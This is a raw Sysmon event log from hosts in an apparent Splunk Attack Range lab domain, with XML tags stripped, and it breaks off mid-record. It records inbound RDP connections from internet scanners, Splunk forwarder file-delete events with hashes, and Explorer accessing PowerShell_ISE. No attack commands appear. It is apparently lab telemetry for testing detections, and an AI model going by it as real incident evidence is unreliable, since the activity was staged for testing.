SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com55643-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049008Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:30.778{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-61117-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049007Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:33.121{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F80C95CB8B5916F571136463C2BB1452,SHA256=B906AD3CE6EB17D8AF05B7A6CB55F879E88206849D21C3AAF4E876AF4F9C5EEB,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062695Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:32.156{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57428-false10.0.1.12-8000- 354300x800000000000000062694Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:31.939{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-51597-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000062693Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:31.934{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-54333-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000062692Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:33.645{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A38B8FFA03191E6BD5E92EA44A127AD7,SHA256=98D1B9D99140126EB9D49C19E3D6556E90416387047741A95EFD1CA5C52F9702,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049013Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:31.731{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52460-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000049012Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:34.136{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B52CA01A501A16E602A261644681037,SHA256=5ABEDBDB9088B7A264396F6B6EC6B2F96B72AC814577BA213DF9F4C14083053E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062697Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:34.739{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7058E64BA00DB96013412160746E187D,SHA256=60EBF7BC60E92364A9942A974E1E967143F96E73985E528C3E935046356E4075,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062696Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:34.005{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F98B10E319D4B3CB67057BD38055DDC,SHA256=2FE912C4707E0B66566C1D78C57D68849076DE580A07EFFDAB14E7DA59F6EE21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049011Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:34.011{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=511143772C21AE76A23ECD368EF13224,SHA256=F03992B62B28E55708E2CE4C6111B454FB8E3E1D2BC6AAD3235658B7D42C5362,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049016Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:32.968{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-49191-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049015Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:35.185{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=50F1CC0083583DA42FB3252D1A018583,SHA256=06B458001E2E77859BE4C5AA3B2E37DE1C12B4FFE8D3952D2FDD72F35F0B0B3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049014Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:35.153{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=615042E4B3948A6FFCCF94B808441A16,SHA256=36134F0490469FF5CDA8B488FE062F356FF6ACAA201D77D3A0F73FE39AEE11EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062698Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:35.020{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE73181AB034F8A095AEC26B21E5F964,SHA256=AF0A6BB078096B4C8AAB0D416C6ED381C32257D8FA44C7C4E804A7B48BF748F8,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049019Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:34.631{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-50670-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049018Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:36.509{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2C2F870184AAC8F77C57264E7F017148,SHA256=B720739FA95556AACCCA9166B3ADB401A138BB8D5753272741D9B34E1415D979,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049017Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:36.181{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97B6DC82A1E5330A91945A041FCA7376,SHA256=1778AEF916295D78BB325418DEEC5713BA4C433130D5F1E59D1BA6064C6B18FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062701Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:36.911{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9D64732FEB19CB68BEB83035E092E613,SHA256=BBFD72BB22602BDBBFA0D062CD8D39062C88C04AD7DD114AA14D3106BCD04A36,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062700Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:34.962{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com56246-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000062699Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:36.083{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F21A4687768C6F8583F4C1CDEBBF2A4,SHA256=C3B820572C7C4B3D326E4BD5DE48969B1DE2F25E6A038535FFCE3D08950CC1B2,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049021Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:36.087{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-52142-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049020Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:37.183{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=985869E079C768CF3E15848C53D9E797,SHA256=CDB05ADDF394D0E14791667FFC090FBEF54439C1DF6D4D6FF05B106DB20F7320,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062703Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:36.470{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-55701-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000062702Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:37.083{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F1B156B4071E4916DC0B1A2B7A707EB,SHA256=C825B5A1F39CED8E9DBDC2E5919F80B3559720371F6AAEED621C81044E73D713,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049024Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:36.777{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52461-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000049023Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:38.214{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61074AB2461018FFD40A094E78887147,SHA256=FD31271DDAED78025C8DCBA0254275402BA15FC2A35151F4DCDEE366B8CEFCA7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062707Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:37.692{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com64902-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000062706Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:37.203{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57429-false10.0.1.12-8000- 23542300x800000000000000062705Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:38.255{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=706FC4F161DEF1CC8403908936B7A5FE,SHA256=C3DACA02AFB0EA1FD41770F4A753489CB1F8F9AF916D8863DF75D54FDA8C996F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062704Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:38.098{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBA18CFBEF1FCA804673994380FC8614,SHA256=D48380FB5316C6637A1730CD9A31AC7A85C90687C847BB8C19631850E10ECBD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049022Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:38.199{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8A4ACA11C62A5F425CF9640D3D130D9A,SHA256=A23C1A0287FE4BC4A7CB55F75DED5B3CD004EC2B1DA8E05D020241D72D52787E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049026Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:39.386{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8E4EAE75027B3D4F569F98AC15948008,SHA256=BC9C07D569CF971C974BF0A07265079560F50C4C6EEB1E9B1E62F4FAD47DC50E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049025Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:39.246{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFDC3DE14B05FA8316FF79976533C155,SHA256=8A7AA8E167007D3CDF6A515E7CC99478DA9F3A1B32B1F36797A3A2A1DAFC6698,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062711Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:38.040{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-57069-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000062710Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:37.903{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-59805-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000062709Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:39.583{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=50364E55F5E8E77ABE2C7EDD5ECDDB9C,SHA256=E1A8A8E46792B27A8413F6D2490D9FAB3DAC8DDA70624BE5A3816AECD6B02C28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062708Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:39.130{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F258935053D5D16BF30D9EB75C7B9612,SHA256=877E79F1AA85FEA56492A1C38CCD419DFE4B104310B903BCB59F9537E54A2B4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049027Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:40.277{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D752CD56D5C7B06F7A5B18EB8212B5A,SHA256=AFCD4EC348D1526FB6114E18F022A662E04C35FFEE654E7F7F0AD3417D056B4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062713Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:40.833{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4D74CCA51FAD6D10FB9F6965615FF6D8,SHA256=FDE8A2F480F814ADEEAEB4AE0BC828B8E655483FF249D079C33A3D477E2C9646,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062712Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:40.145{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D29733C4BC1162BBDE014D944EA06C25,SHA256=D06BC223426057CEAC9833B5EA755261FA08871AE69C6ECC193E4545F7F32809,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049028Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:41.308{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F21A47B14E2583A3F670EAECF71C9142,SHA256=BC5993A59041D218F5E8F575603309ADEF507F98D263E9653196E34BB534C1E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062717Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:41.161{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FE4A5B1CC385E02327FC2365646FAAE,SHA256=6CC89F2E0784250265E90543554B1CB7CD8266AB7817FAD82B4F81A78BB1051D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062716Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:39.807{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com63535-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000062715Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:39.580{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-58437-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000062714Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:39.545{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-2197-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000049031Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:40.793{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-56570-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049030Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:40.691{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com53478-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049029Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:42.324{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB41FAC1E3F06F7EDE5AD2A7A99FABFD,SHA256=E7BA91371FA6AEED5328BD6B8D7EDD4828C6FFBEE4698CA5766A65EB4F740C77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062718Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:42.176{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F977B77DC9F8520D31399B80335F715D,SHA256=4F42A363B2B0775CB0F1667204F104FC152FCE0F145EFDDF58E634992F657B4B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049035Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:41.793{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52462-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000049034Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:41.669{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com49357-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049033Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:43.371{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B71A733CC349F7D4CE71422D45AC8897,SHA256=33EA80D2177CE3F0390159806DCF2C1E210E4AD90454EF0C3AC691F0482A2AF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000062724Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:43.520{A7A01FEF-C0A6-607E-8105-00000000BB01}8366128C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+194dd|C:\Windows\System32\SHELL32.dll+61df0|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062723Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:43.520{A7A01FEF-C0A6-607E-8105-00000000BB01}8366128C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062722Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:43.520{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+194dd|C:\Windows\System32\SHELL32.dll+61df0|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062721Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 